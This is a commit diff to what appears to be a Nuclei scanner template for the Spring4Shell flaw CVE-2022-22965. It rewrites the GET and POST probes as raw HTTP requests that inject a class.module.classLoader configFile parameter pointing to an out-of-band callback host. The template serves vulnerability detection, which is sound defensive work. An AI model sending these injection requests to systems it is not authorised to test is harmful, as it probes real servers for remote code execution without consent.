Updated CVE-2022-22965.yaml

patch-1
y00425414 2022-08-09 10:58:38 +08:00
parent 276f851e3c
commit 3a82423598
1 changed files with 12 additions and 14 deletions

View File

@ -21,19 +21,19 @@ info:
tags: cve,cve2022,rce,spring,injection,oast,intrusive,kev
requests:
- method: GET
path:
- "{{BaseURL}}/?class.module.classLoader.resources.context.configFile=https://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx"
- method: POST
path:
- "{{BaseURL}}"
headers:
- raw:
- |
POST {{BaseURL}} HTTP/1.1
Content-Type: application/x-www-form-urlencoded
body: |
class.module.classLoader.resources.context.configFile=https://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx
class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx
- |
GET /?class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1
payloads:
interact_protocol:
- http
- https
matchers-condition: and
matchers:
@ -47,5 +47,3 @@ requests:
words:
- "User-Agent: Java"
case-insensitive: true
# Enhanced by mp on 2022/05/19